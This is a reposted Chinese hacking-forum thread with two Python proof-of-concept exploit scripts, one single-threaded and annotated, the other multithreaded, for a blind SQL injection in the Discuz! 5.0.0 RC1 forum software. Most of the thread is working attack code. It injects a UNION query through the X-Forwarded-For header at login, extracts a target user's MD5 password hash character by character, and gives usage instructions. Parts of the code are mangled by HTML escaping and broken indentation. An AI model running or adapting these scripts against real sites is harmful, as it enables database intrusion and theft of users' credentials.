发新话题
打印

[转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)

[转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)

原创作者:wofeiwo

#wofeiwo原创,pt007给程序做了一下注释,以方便其它人的学习:
#!c:\python24\pyton
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(lenthofpass,realurl,path):
   sys.stdout.write('[+]The uid='+sys.argv[2]+' password hash is: \n')
   for num in range(1,lenthofpass+1): #相当于[1,...,32],num代表32位的MD5值
      ran=range(97, 123) #ran=[97,...,122],ASCII码的a-z
      #for a1 in range(65,91): #a1=[65,90],ASCII码的A-Z
        #  ran.append(a1)
      for a in range(48, 58): #a=[48,...,57],ASCII码的0-9
        ran.append(a) #将序列a加入到序列ran中
      
      for i in ran: #遍历ran序列,包括全部小写字母和数字

        query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
        #下面是一个字典:
        header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        #print header
        #sys.exit(1)
        http = httplib.HTTPConnection(realurl[1]) #连接到如:httplib.HTTPConnection('www.cwi.nl')
        http.request("POST", path + "logging.php?action=login&",data , header) #发送POS数据包
        #sleep(1)
        response = http.getresponse() #得到服务的响应包
        re1 = response.read() #读出所有响应数据并存入ret1中
        #print "re1中返回的内容为:"
        #print re1
        if re1.find('SELECT') ==1: #re1中是否含有SELECT字符,是为1,否返回-1
           print '[-] Unvalnerable host' #不存在漏洞
           print '[-] Exit..'
           sys.exit(1);

        elif re1.find('ip3') == -1:#re1中是否含有ip3字符,是为1,否返回-1
           sys.stdout.write(chr(i)) #输出正确的MD5密码值
           #print chr(i)
           http.close()
           #sleep(1)
           #break
           
           #print re1
           #print '-----------------------------------------------'
           http.close()
           #sleep(1)
           sys.stdout.write('\n') #打印回车

def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

if len(sys.argv) == 3:
    url = urlparse(sys.argv[1])
    if url[2:-1] != '/': #从元组中第三个到倒数第二个参数
      u = url[2] + '/'
    else:
      u = url[2] #u=/dz/
else:
    print "Usage: %s <url> <uid>" % sys.argv[0]
    print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
    sys.exit(0)

lenth = 32 #长度为32
print &#39;[+] Connect %s&#39; % url[1]
print &#39;[+] Trying...&#39;
print &#39;[+] Plz wait a long long time...&#39;

injection(lenth, url, u)

print &#39;[+] Finished&#39;

if __name__ == &#39;__main__&#39;: main()
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

TOP

呵呵,练手的程序.让人见笑了
我再发个多线程版本的python程序.也是练手用,算法和多线程同步都没做好.
真正效率高的,还是要看c语言版本算法精良的.
复制内容到剪贴板
代码:
#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Bug find by Defence80 ([url]http://www.defence80.com[/url])
# Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

password = {1:&#39;&#39;,2:&#39;&#39;,3:&#39;&#39;,4:&#39;&#39;,5:&#39;&#39;,6:&#39;&#39;,7:&#39;&#39;,8:&#39;&#39;,9:&#39;&#39;,10:&#39;&#39;,11:&#39;&#39;,12:&#39;&#39;,13:&#39;&#39;,14:&#39;&#39;,15:&#39;&#39;,16:&#39;&#39;,17:&#39;&#39;,18:&#39;&#39;,19:&#39;&#39;,20:&#39;&#39;,21:&#39;&#39;,22:&#39;&#39;,23:&#39;&#39;,24:&#39;&#39;,25:&#39;&#39;,26:&#39;&#39;,27:&#39;&#39;,28:&#39;&#39;,29:&#39;&#39;,30:&#39;&#39;,31:&#39;&#39;,32:&#39;&#39;}

class creatthread (threading.Thread):
   def __init__ (self, threadname, url, u):
      self.realurl = url
      self.realu = u
      threading.Thread.__init__(self, name = threadname)
      
   def run (self):
      lenth = 32
      injection(lenth, self.realurl, self.realu, self.getName())      
   
def  injection (lenthofpass, realurl, path, num):
      
      ran = range(97, 123)
      for a in range(48, 58): ran.append(a)

      for i in ran:
   
        query = &#39;\&#39; union select 122,122,122,122,122,122,122,122 from cdb_members where uid=&#39; + sys.argv[2] + &#39; AND ascii(substring(CONCAT(password),&#39; + num + &#39;,1))=&#39; + str(i) + &#39; /*&#39;
        header = {&#39;Accept&#39;:&#39;image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*&#39;,&#39;Referer&#39;:&#39;http://&#39; + realurl[1] + path + &#39;logging.php?action=login&#39;,&#39;Accept-Language&#39;:&#39;zh-cn&#39;,&#39;Content-Type&#39;:&#39;application/x-www-form-urlencoded&#39;,&#39;User-Agent&#39;:&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)&#39;,&#39;Connection&#39;:&#39;Keep-Alive&#39;,&#39;Cache-Control&#39;:&#39;no-cache&#39;,&#39;X-Forwarded-For&#39;:query,&#39;Cookie&#39;:&#39;cdb_sid=70KRjS; cdb_cookietime=2592000&#39;}
        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        #print header
        #sys.exit(1)
        http = httplib.HTTPConnection(realurl[1])
        http.request("POST", path + "logging.php?action=login&",data , header)
        sleep(1)
        response = http.getresponse()
        re1 = response.read()
        if re1.find(&#39;SELECT&#39;) == -1:
           print &#39;[-] Unvalnerable host&#39;
           print &#39;[-] Exit..&#39;
           sys.exit(1);
   
        elif re1.find(&#39;ip3&#39;) == -1:
           password[int(num)] = chr(i)
           #print &#39;[+] password &#39; + num + &#39;: &#39; + chr(i)
           http.close()
           sleep(1)
           break
        #print re1
        #print &#39;-----------------------------------------------&#39;
        http.close()
        sleep(1)

def main ():
   print &#39;Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)&#39;
   print &#39;Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n&#39;

   if len(sys.argv) == 3:
      url = urlparse(sys.argv[1])
      if url[2:-1] != &#39;/&#39;:
        u = url[2] + &#39;/&#39;
      else:
        u = url[2]
   else:
      print "Usage: %s <url> <uid>" % sys.argv[0]
      print "Example: %s [url]http://127.0.0.1/dz/[/url] 1" % sys.argv[0]
      sys.exit(0)

   print &#39;[+] Connect %s&#39; % url[1]
   print &#39;[+] Begin threads...&#39;
   print &#39;[+] Plz wait a long long time...&#39;
   
   for a in range(1,33) :
      thread = creatthread(str(a), url, u)
      thread.start()
   
   while threading.activeCount() != 1:
      continue
   else:
      sys.stdout.write( &#39;[+] The uid=&#39; + sys.argv[2] + &#39; password hash is: &#39; )
      for n in range(1, 33) :
        sys.stdout.write(password[n])
      sys.stdout.write(&#39;\n[+] Finished \n&#39;)
      

if __name__ == &#39;__main__&#39;: main()
http://www.phpweblog.net/GaRY/

TOP

发新话题